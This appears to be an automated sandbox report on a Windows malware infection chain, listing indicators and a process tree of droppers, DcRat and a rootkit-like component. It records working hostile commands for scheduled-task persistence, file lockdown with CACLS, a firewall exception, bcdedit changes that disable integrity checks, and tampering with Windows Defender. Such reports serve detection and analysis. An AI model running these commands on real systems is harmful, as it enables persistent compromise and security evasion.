Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	2904	4A83.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	3056	22D5.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	1712	Znhguqzxljx.png
Token: SeDebugPrivilege	1616	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeImpersonatePrivilege	1616	31839b57a4f11171d6abc8bbc4451ee4.exe
Token: SeDebugPrivilege	2852	4D04.exe
Token: SeShutdownPrivilege	3644	powercfg.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	2708	kos4.exe
Token: SeShutdownPrivilege	3720	powercfg.exe
Token: SeShutdownPrivilege	3728	powercfg.exe
Token: SeShutdownPrivilege	3756	powercfg.exe
Token: SeSystemEnvironmentPrivilege	4012	csrss.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeShutdownPrivilege	3428	powercfg.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeShutdownPrivilege	552	powercfg.exe
Token: SeShutdownPrivilege	820	powercfg.exe
Token: SeShutdownPrivilege	3516	powercfg.exe
Token: SeDebugPrivilege	1980	amers.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	3112	updater.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeLockMemoryPrivilege	3928	explorer.exe
Token: SeSecurityPrivilege	2640	sc.exe
Token: SeSecurityPrivilege	2640	sc.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1208	Explorer.EXE
1208	Explorer.EXE
888	iexplore.exe
888	iexplore.exe
2032	5E15.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1208	Explorer.EXE
1208	Explorer.EXE

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
888	iexplore.exe
888	iexplore.exe
888	iexplore.exe
888	iexplore.exe
2616	IEXPLORE.EXE
2616	IEXPLORE.EXE
2616	IEXPLORE.EXE
2616	IEXPLORE.EXE
1580	IEXPLORE.EXE
1580	IEXPLORE.EXE
2616	IEXPLORE.EXE
2616	IEXPLORE.EXE
1544	IEXPLORE.EXE
1544	IEXPLORE.EXE
2384	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 1564 wrote to memory of 2308	1564	DW2sa51.exe	28
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2308 wrote to memory of 2636	2308	vB4ma75.exe	29
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2636 wrote to memory of 2792	2636	PK2UA89.exe	30
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2792 wrote to memory of 2728	2792	wG3AO05.exe	31
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2728 wrote to memory of 2644	2728	1jY48hG1.exe	32
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2792 wrote to memory of 2696	2792	wG3AO05.exe	33
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2696 wrote to memory of 2580	2696	2aW4701.exe	34
PID 2636 wrote to memory of 3036	2636	PK2UA89.exe	35
PID 2636 wrote to memory of 3036	2636	PK2UA89.exe	35
PID 2636 wrote to memory of 3036	2636	PK2UA89.exe	35

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1208
- C:\Users\Admin\AppData\Local\Temp\DW2sa51.exe
  "C:\Users\Admin\AppData\Local\Temp\DW2sa51.exe"
  2⤵
  - DcRat
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vB4ma75.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vB4ma75.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\PK2UA89.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\PK2UA89.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2636
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wG3AO05.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wG3AO05.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:2792
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1jY48hG1.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1jY48hG1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2728
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2aW4701.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2aW4701.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2696
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 268
        8⤵
        Program crash
        
        PID:928
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Ri93ez.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Ri93ez.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3036
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4sL423sr.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4sL423sr.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      PID:2828
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:476
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5WY5TP7.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5WY5TP7.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2128
  - - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
      "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1052
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2056
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:2372
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        6⤵
        
        PID:3004
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        6⤵
        
        PID:876
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2976
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        6⤵
        
        PID:1456
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2196
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        6⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:1020
- C:\Users\Admin\AppData\Local\Temp\9BA3.exe
  C:\Users\Admin\AppData\Local\Temp\9BA3.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  PID:1956
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IN8gZ5gn.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IN8gZ5gn.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\xU8mT4YJ.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\xU8mT4YJ.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      PID:1228
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Fb6jM0Il.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Fb6jM0Il.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\nk2Rg5kr.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\nk2Rg5kr.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dI10GX0.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dI10GX0.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:2336
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:1336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 268
        9⤵
        Program crash
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2iI657iQ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2iI657iQ.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2784
- C:\Users\Admin\AppData\Local\Temp\9C7F.exe
  C:\Users\Admin\AppData\Local\Temp\9C7F.exe
  2⤵
  - Executes dropped EXE
  PID:2460
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\A8DF.bat" "
  2⤵
  PID:3068
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:888
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2616
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:10564609 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1580
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:4207618 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1544
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
    3⤵
    PID:2732
- C:\Users\Admin\AppData\Local\Temp\BA2E.exe
  C:\Users\Admin\AppData\Local\Temp\BA2E.exe
  2⤵
  - Executes dropped EXE
  PID:816
- C:\Users\Admin\AppData\Local\Temp\BB19.exe
  C:\Users\Admin\AppData\Local\Temp\BB19.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Users\Admin\AppData\Local\Temp\CAD3.exe
  C:\Users\Admin\AppData\Local\Temp\CAD3.exe
  2⤵
  - Executes dropped EXE
  PID:1576
- C:\Users\Admin\AppData\Local\Temp\D30E.exe
  C:\Users\Admin\AppData\Local\Temp\D30E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Users\Admin\AppData\Local\Temp\F84B.exe
  C:\Users\Admin\AppData\Local\Temp\F84B.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:372
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2384
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:3048
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:3296
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:3860
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:3888
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3224
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:3208
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:2548
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:1792
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2036
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2112
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3912
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3876
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1560
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:4000
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2624
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3744
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:4040
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3460
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:604
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:3656
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:4064
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2012
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:3136
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3192
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2020
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
- - C:\Users\Admin\AppData\Local\Temp\kos4.exe
    "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2564
- C:\Users\Admin\AppData\Local\Temp\1695.exe
  C:\Users\Admin\AppData\Local\Temp\1695.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1280
- C:\Users\Admin\AppData\Local\Temp\22D5.exe
  C:\Users\Admin\AppData\Local\Temp\22D5.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1520
- C:\Users\Admin\AppData\Local\Temp\4812.exe
  C:\Users\Admin\AppData\Local\Temp\4812.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - outlook_office_path
  - outlook_win_path
  PID:948
- C:\Users\Admin\AppData\Local\Temp\4A83.exe
  C:\Users\Admin\AppData\Local\Temp\4A83.exe
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Users\Admin\AppData\Local\Temp\4D04.exe
  C:\Users\Admin\AppData\Local\Temp\4D04.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Users\Admin\AppData\Local\Temp\5E15.exe
  C:\Users\Admin\AppData\Local\Temp\5E15.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  PID:2032
- - C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
    "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:372
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:2480
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
      4⤵
      PID:2948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2464
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "Utsysc.exe" /P "Admin:N"
        5⤵
        
        PID:1260
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "Utsysc.exe" /P "Admin:R" /E
        5⤵
        
        PID:1788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2624
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\ea7c8244c8" /P "Admin:N"
        5⤵
        
        PID:2212
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\ea7c8244c8" /P "Admin:R" /E
        5⤵
        
        PID:2164
